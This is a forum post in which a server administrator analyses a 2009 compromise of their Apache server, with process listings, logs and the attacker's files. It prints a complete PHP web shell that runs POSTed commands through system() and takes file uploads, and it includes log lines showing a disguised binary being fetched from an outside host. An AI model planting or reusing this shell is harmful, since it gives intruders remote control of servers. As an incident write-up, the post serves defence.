yes, unSpawn, the world writable thing is the thing.
I have all the stuff from the attack.
Can I publish the php scripts here?
The munitions seem to be:
Code:
helios exploit # ./httpd --help
./httpd: invalid option -- '-'
iroffer v1.4.b01 [20040901211948] by PMG, see http://iroffer.org/
(..)
helios exploit # ./x --help
XHide - Process Faker, by Schizoprenic Xnuxer Research (c) 2002
...follows:
Code:
helios exploit # cat murqdh.php
<
and a large and evil looking script that begins thus:
Code:
helios exploit # cat rfrcew.php
This combination seems to have unleashed a torrent of data initiated by my server against a very neighboring one (one route away) that expended 40G in less than 5 min, the host noticed and took my ports offline.
I monitored top and netstat to see if I could work out what was going on before I started stopping things... (ssh'd via my iLO)
apache was full throttle:
Code:
top - 19:54:25 up 29 days, 21:20, 1 user, load average: 1.00, 1.01, 1.00
Tasks: 127 total, 2 running, 124 sleeping, 0 stopped, 1 zombie
Cpu(s): 0.0%us, 50.0%sy, 0.0%ni, 50.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
Mem: 3630412k total, 2963236k used, 667176k free, 524328k buffers
Swap: 1959920k total, 156k used, 1959764k free, 1771116k cached
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
16043 apache 20 0 1768 304 188 R 165 0.0 78:29.10 httpd
1 root 20 0 1636 544 476 S 0 0.0 0:17.67 init
2 root 15 -5 0 0 0 S 0 0.0 0:00.00 kthreadd
3 root RT -5 0 0 0 S 0 0.0 0:03.05 migration/0
4 root 15 -5 0 0 0 S 0 0.0 3:31.88 ksoftirqd/0
5 root RT -5 0 0 0 S 0 0.0 0:04.58 watchdog/0
6 root RT -5 0 0 0 S 0 0.0 0:01.35 migration/1
7 root 15 -5 0 0 0 S 0 0.0 3:18.87 ksoftirqd/1
8 root RT -5 0 0 0 S 0 0.0 0:00.17 watchdog/1
9 root RT -5 0 0 0 S 0 0.0 0:02.83 migration/2
10 root 15 -5 0 0 0 S 0 0.0 3:18.46 ksoftirqd/2
11 root RT -5 0 0 0 S 0 0.0 0:00.16 watchdog/2
12 root RT -5 0 0 0 S 0 0.0 0:01.25 migration/3
13 root 15 -5 0 0 0 S 0 0.0 3:03.70 ksoftirqd/3
14 root RT -5 0 0 0 S 0 0.0 0:00.15 watchdog/3
15 root 15 -5 0 0 0 S 0 0.0 0:14.90 events/0
16 root 15 -5 0 0 0 S 0 0.0 0:17.40 events/1
17 root 15 -5 0 0 0 S 0 0.0 0:13.38 events/2
BTW that is probably 100% with the watch chopping off at %65.
I stopped apache2 and went looking for recent files:
Code:
find /var/www/ -type f -printf '%TY-%Tm-%Td %TT %p\n' | sort
this showed the offending files straight away modified at the start of the attack - they didn't plant and wait - they must have dumped the munitions and initiated the sequence immediately.
Once I saw the httpd bin I knew it would show in the apache logs
Code:
helios apache2 # grep httpd ./*
./error_log:==> Fakename: /usr/local/apache/bin/httpd -DSSL PidNum: 5908
./error_log:--2009-08-05 18:20:33-- http://lichno.net/step/phpThumb/cache/a/ad/a/httpd
./error_log:Saving to: `httpd'
./error_log:2009-08-05 18:20:54 (15.1 KB/s) - `httpd' saved [306414/306414]
and there it was at the time of the launch fo the attack...
Finally here is the process list at the time the attack was going (but disconnected)
Code:
helios logs-n-snips # cat ps
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 1636 544 ? Ss Jul06 0:17 init [3]
root 2 0.0 0.0 0 0 ? S< Jul06 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S< Jul06 0:03 [migration/0]
root 4 0.0 0.0 0 0 ? S< Jul06 3:31 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< Jul06 0:04 [watchdog/0]
root 6 0.0 0.0 0 0 ? S< Jul06 0:01 [migration/1]
root 7 0.0 0.0 0 0 ? S< Jul06 3:18 [ksoftirqd/1]
root 8 0.0 0.0 0 0 ? S< Jul06 0:00 [watchdog/1]
root 9 0.0 0.0 0 0 ? S< Jul06 0:02 [migration/2]
root 10 0.0 0.0 0 0 ? S< Jul06 3:18 [ksoftirqd/2]
root 11 0.0 0.0 0 0 ? S< Jul06 0:00 [watchdog/2]
root 12 0.0 0.0 0 0 ? S< Jul06 0:01 [migration/3]
root 13 0.0 0.0 0 0 ? S< Jul06 3:03 [ksoftirqd/3]
root 14 0.0 0.0 0 0 ? S< Jul06 0:00 [watchdog/3]
root 15 0.0 0.0 0 0 ? S< Jul06 0:14 [events/0]
root 16 0.0 0.0 0 0 ? S< Jul06 0:17 [events/1]
root 17 0.0 0.0 0 0 ? S< Jul06 0:13 [events/2]
root 18 0.0 0.0 0 0 ? S< Jul06 0:17 [events/3]
root 19 0.0 0.0 0 0 ? S< Jul06 0:00 [khelper]
root 106 0.0 0.0 0 0 ? S< Jul06 0:02 [kblockd/0]
root 107 0.0 0.0 0 0 ? S< Jul06 0:01 [kblockd/1]
root 108 0.0 0.0 0 0 ? S< Jul06 0:01 [kblockd/2]
root 109 0.0 0.0 0 0 ? S< Jul06 0:01 [kblockd/3]
root 111 0.0 0.0 0 0 ? S< Jul06 0:00 [kacpid]
root 112 0.0 0.0 0 0 ? S< Jul06 0:00 [kacpi_notify]
root 186 0.0 0.0 0 0 ? S< Jul06 0:00 [ata/0]
root 187 0.0 0.0 0 0 ? S< Jul06 0:00 [ata/1]
root 188 0.0 0.0 0 0 ? S< Jul06 0:00 [ata/2]
root 189 0.0 0.0 0 0 ? S< Jul06 0:00 [ata/3]
root 190 0.0 0.0 0 0 ? S< Jul06 0:00 [ata_aux]
root 191 0.0 0.0 0 0 ? S< Jul06 0:00 [ksuspend_usbd]
root 196 0.0 0.0 0 0 ? S< Jul06 0:00 [khubd]
root 199 0.0 0.0 0 0 ? S< Jul06 0:00 [kseriod]
root 258 0.0 0.0 0 0 ? S Jul06 2:53 [pdflush]
root 259 0.0 0.0 0 0 ? S< Jul06 0:11 [kswapd0]
root 300 0.0 0.0 0 0 ? S< Jul06 0:00 [aio/0]
root 301 0.0 0.0 0 0 ? S< Jul06 0:00 [aio/1]
root 302 0.0 0.0 0 0 ? S< Jul06 0:00 [aio/2]
root 303 0.0 0.0 0 0 ? S< Jul06 0:00 [aio/3]
root 998 0.0 0.0 0 0 ? S< Jul06 0:00 [khpsbpkt]
root 1039 0.0 0.0 0 0 ? S< Jul06 0:00 [kpsmoused]
root 1043 0.0 0.0 0 0 ? S< Jul06 0:00 [kstriped]
root 1045 0.0 0.0 0 0 ? S< Jul06 0:00 [kondemand/0]
root 1046 0.0 0.0 0 0 ? S< Jul06 0:00 [kondemand/1]
root 1047 0.0 0.0 0 0 ? S< Jul06 0:00 [kondemand/2]
root 1048 0.0 0.0 0 0 ? S< Jul06 0:00 [kondemand/3]
root 1060 0.0 0.0 0 0 ? S< Jul06 0:00 [rpciod/0]
root 1061 0.0 0.0 0 0 ? S< Jul06 0:00 [rpciod/1]
root 1062 0.0 0.0 0 0 ? S< Jul06 0:00 [rpciod/2]
root 1063 0.0 0.0 0 0 ? S< Jul06 0:00 [rpciod/3]
root 1071 0.0 0.0 0 0 ? S< Jul06 1:24 [kjournald]
root 1175 0.0 0.0 1896 604 ? S<s Jul06 0:09 /sbin/udevd --daemon
root 2251 0.0 0.0 0 0 ? S< Jul06 3:54 [kjournald]
root 2252 0.0 0.0 0 0 ? S< Jul06 0:00 [kjournald]
root 2253 0.0 0.0 0 0 ? S< Jul06 0:04 [kjournald]
root 2875 0.0 0.0 3456 1340 ? Ss Jul06 0:49 /usr/sbin/syslog-ng
amavis 4010 0.0 1.4 60168 51516 ? Ss Jul06 0:25 amavisd (master)
root 4356 0.0 0.0 4204 912 ? Ss Jul06 0:00 /usr/sbin/sshd
root 4532 0.0 0.0 1904 708 ? Ss Jul06 0:02 /usr/sbin/cron
clamav 4647 0.0 3.5 155604 127988 ? SNsl Jul13 9:42 /usr/sbin/clamd
clamav 4657 0.0 0.0 3048 1400 ? SNs Jul13 0:04 /usr/bin/freshclam -d
apache 4835 0.0 0.3 25456 13516 ? S 17:46 0:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
mysql 5576 6.6 1.9 188284 69712 ? Ssl Jul06 2875:49 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock
root 5719 0.0 0.0 1620 408 ? S Jul06 0:00 /usr/sbin/courierlogger -pid=/var/run/authdaemon.pid -start /usr/lib/courier/courier-authlib/authdaemond
root 5720 0.0 0.0 5276 1228 ? S Jul06 0:00 /usr/lib/courier/courier-authlib/authdaemond
root 5724 0.0 0.0 5500 1436 ? S Jul06 0:02 /usr/lib/courier/courier-authlib/authdaemond
root 5725 0.0 0.0 5500 1436 ? S Jul06 0:02 /usr/lib/courier/courier-authlib/authdaemond
root 5726 0.0 0.0 5500 1436 ? S Jul06 0:02 /usr/lib/courier/courier-authlib/authdaemond
root 5727 0.0 0.0 5500 1440 ? S Jul06 0:02 /usr/lib/courier/courier-authlib/authdaemond
root 5728 0.0 0.0 5500 1436 ? S Jul06 0:02 /usr/lib/courier/courier-authlib/authdaemond
root 5792 0.0 0.0 1716 524 ? S Jul06 0:02 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/lib/courier-imap/courierlogger -stderrloggername=imapd -maxprocs=40 -maxperip=4 -pid=/var/run/imapd.pid -nodnslookup -noidentlookup 143 /usr/sbin/imaplogin /usr/lib/courier-imap/courier-imapd.indirect Maildir
root 5795 0.0 0.0 1620 476 ? S Jul06 0:02 /usr/lib/courier-imap/courierlogger imapd
root 5856 0.0 0.0 1716 516 ? S Jul06 0:00 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/lib/courier-imap/courierlogger -stderrloggername=pop3d -maxprocs=40 -maxperip=4 -pid=/var/run/pop3d.pid -nodnslookup -noidentlookup 110 /usr/sbin/pop3login /usr/lib/courier-imap/courier-pop3d.indirect .maildir
root 5859 0.0 0.0 1488 320 ? S Jul06 0:00 /usr/lib/courier-imap/courierlogger pop3d
apache 5908 0.0 0.0 0 0 ? Z 17:48 0:00 [httpd] <defunct>
apache 5909 0.0 0.0 1768 640 ? S 17:48 0:00 [httpd]
root 5914 0.0 0.0 1844 468 ? Ss Jul06 0:00 /usr/sbin/gpm -m /dev/input/mice -t ps2
root 6237 0.3 0.0 100576 1040 ? Ssl Jul06 132:51 hpasmd
root 6278 0.0 0.0 2492 1412 ? S Jul06 0:14 cmathreshd -p 5 -s OK
root 6282 0.0 0.0 10624 1376 ? S Jul06 12:19 cmahostd -p 15 -s OK
root 6287 0.0 0.0 10692 1240 ? Sl Jul06 0:02 cmapeerd
root 6327 0.0 0.0 18332 916 ? Sl Jul06 0:18 cmastdeqd -p 30
root 6334 0.0 0.0 51148 844 ? Sl Jul06 2:24 cmahealthd -p 30 -s OK -t OK -i
root 6474 0.0 0.0 10092 788 ? S Jul06 0:05 cmaided -p 15 -s OK
root 6482 0.0 0.0 1880 596 ? S Jul06 0:01 cmascsid -p 15 -s OK
root 6499 0.0 0.0 1868 564 ? S Jul06 0:01 cmasasd -p 15 -s OK
106 7126 0.3 0.4 43868 17344 ? Ssl Jul06 131:23 /usr/bin/memcached -d -p 11211 -l 127.0.0.1 -m 512 -c 1024 -u memcached -P /var/run/memcached/memcached-11211.pid
ntop 7186 0.3 1.2 122724 43984 ? Ssl Jul06 170:41 /usr/bin/ntop -d -L -u ntop -P /var/lib/ntop
root 7350 0.0 0.0 2064 524 ? Ss Jul06 0:00 /usr/sbin/saslauthd -a rimap -r -O localhost
root 7351 0.0 0.0 2064 484 ? S Jul06 0:00 /usr/sbin/saslauthd -a rimap -r -O localhost
root 7352 0.0 0.0 2064 488 ? S Jul06 0:00 /usr/sbin/saslauthd -a rimap -r -O localhost
root 7353 0.0 0.0 2064 484 ? S Jul06 0:00 /usr/sbin/saslauthd -a rimap -r -O localhost
root 7354 0.0 0.0 2064 484 ? S Jul06 0:00 /usr/sbin/saslauthd -a rimap -r -O localhost
amavis 7400 0.0 1.4 62828 53656 ? S 15:59 0:02 amavisd (ch7-avail)
root 7416 0.0 0.7 30012 27724 ? Ss Jul06 5:42 /usr/sbin/spamd -d -r /var/run/spamd.pid -m 5 -c -H
root 7584 0.0 0.7 30012 25992 ? S Jul06 0:01 spamd child
root 7585 0.0 0.7 30012 25900 ? S Jul06 0:02 spamd child
apache 9392 0.1 0.3 27060 13772 ? S 18:28 0:07 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
root 9493 0.0 0.1 18308 5984 ? Sl Jul06 4:10 /usr/sbin/snmpd -p /var/run/snmpd.pid
root 9616 0.0 0.0 2596 1240 tty1 Ss Jul06 0:00 /bin/login --
root 9617 0.0 0.0 1632 460 tty2 Ss+ Jul06 0:00 /sbin/agetty 38400 tty2 linux
root 9618 0.0 0.0 1632 456 tty3 Ss+ Jul06 0:00 /sbin/agetty 38400 tty3 linux
root 9619 0.0 0.0 1632 460 tty4 Ss+ Jul06 0:00 /sbin/agetty 38400 tty4 linux
root 9620 0.0 0.0 1632 464 tty5 Ss+ Jul06 0:00 /sbin/agetty 38400 tty5 linux
root 9621 0.0 0.0 1632 460 tty6 Ss+ Jul06 0:00 /sbin/agetty 38400 tty6 linux
apache 10292 0.0 0.3 24664 12780 ? S 18:29 0:04 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
root 10673 0.0 0.0 7012 1812 ? Ss Jul07 0:33 /usr/lib/postfix/master
postfix 10677 0.0 0.0 7348 2164 ? S Jul07 0:17 qmgr -l -t fifo -u
apache 12108 0.0 0.3 24548 12684 ? S 18:31 0:04 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
apache 12505 0.0 0.3 24528 12644 ? S 18:32 0:04 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
apache 12686 0.1 0.3 25048 13200 ? S 18:32 0:04 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
apache 13889 0.1 0.3 24988 13092 ? S 18:33 0:04 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
amavis 14711 0.0 1.6 69208 60208 ? S 12:36 0:06 amavisd (ch19-avail)
apache 15948 0.0 0.3 27176 14220 ? S 18:35 0:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
apache 16020 0.0 0.3 24792 12896 ? S 18:35 0:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
apache 16043 99.9 0.0 1768 304 ? R 18:35 69:33 [httpd]
apache 16221 0.0 0.3 24640 12764 ? S 18:38 0:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
postfix 16745 0.0 0.0 7056 1744 ? S 18:53 0:00 pickup -l -t fifo -u
apache 17268 0.0 0.3 23924 11988 ? S 19:10 0:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
1000 18266 0.0 0.0 3008 1572 tty1 S 19:42 0:00 -bash
root 18302 0.0 0.0 2488 1152 tty1 S 19:43 0:00 su
root 18303 0.0 0.0 2880 1588 tty1 S 19:43 0:00 bash
postfix 18370 0.0 0.0 7196 2000 ? S 19:44 0:00 smtp -t unix -u
root 18389 0.0 0.0 2276 888 tty1 R+ 19:45 0:00 ps aux
root 28969 0.0 0.0 0 0 ? S Aug03 0:16 [pdflush]
root 29674 0.0 0.3 22204 11516 ? Ss Jul07 22:40 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
named 29761 0.0 0.5 22592 19764 ? Ss Jul07 4:38 /usr/sbin/named -u named -n 4 -t /var/chroot/dns
nobody 29798 0.0 0.0 6336 1440 ? Ss Jul23 0:16 proftpd: (accepting connections)
Thanks for your interest unSpawn.
Cheers,
\\'
oh and one more I missed:
Code:
helios exploit # cat errors.php
<body bgcolor="#C0C0C0">Carnivores Team We Own The Net!
<?php
set_magic_quotes_runtime(0);
print "<style>body{font-family:trebuchet ms;font-size:16px;}hr{width:100%;height:2px;}</style>";
print "<center><h1>Team Carnivores</h1></center>";
print "<hr><hr>";
$currentWD = str_replace("\\\\","\\",$_POST['_cwd']);
$currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
$UName = `uname -a`;
$SCWD = `pwd`;
$UserID = `id`;
if( $currentWD == "" ) {
$currentWD = $SCWD;
}
print "<table>";
print "<tr><td><b>My IP:</b></td><td>".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")</td></tr>";
print "<tr><td><b>Server is:</b></td><td>".$_SERVER['SERVER_SIGNATURE']."</td></tr>";
print "<tr><td><b>uname -a:</b></td><td>$UName</td></tr>";
print "<tr><td><b>ID:</b></td><td>$UserID</td></tr>";
print "</table>";
print "<hr><hr>";
if( $_POST['_act'] == "List files!" ) {
$currentCMD = "ls -la";
}
print "<form method=post enctype=\"multipart/form-data\"><table>";
print "<tr><td><b>CMD:</b></td><td><input size=100 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
print "<td><input type=submit name=_act value=\"Shoot!\"></td></tr>";
print "<tr><td><b>PWD:</b></td><td><input size=100 name=\"_cwd\" value=\"".$currentWD."\"></td>";
print "<td><input type=submit name=_act value=\"ls -al\"></td></tr>";
print "<tr><td><b>Inject:</b></td><td><input size=85 type=file name=_upl></td>";
print "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";
print "</table></form><hr><hr>";
$currentCMD = str_replace("\\\"","\"",$currentCMD);
$currentCMD = str_replace("\\\'","\'",$currentCMD);
if( $_POST['_act'] == "Upload!" ) {
if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
print "<center><b>fuckers blocked us try again!</b></center>";
} else {
print "<center><pre>";
system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
print "</pre><b>File uploaded baby good work!</b></center>";
}
} else {
print "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";
$currentCMD = "cd ".$currentWD.";".$currentCMD;
system($currentCMD);
print "\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center><hr><hr><center><b>ownd Baby</b></center>";
}
exit;
?>
helios exploit #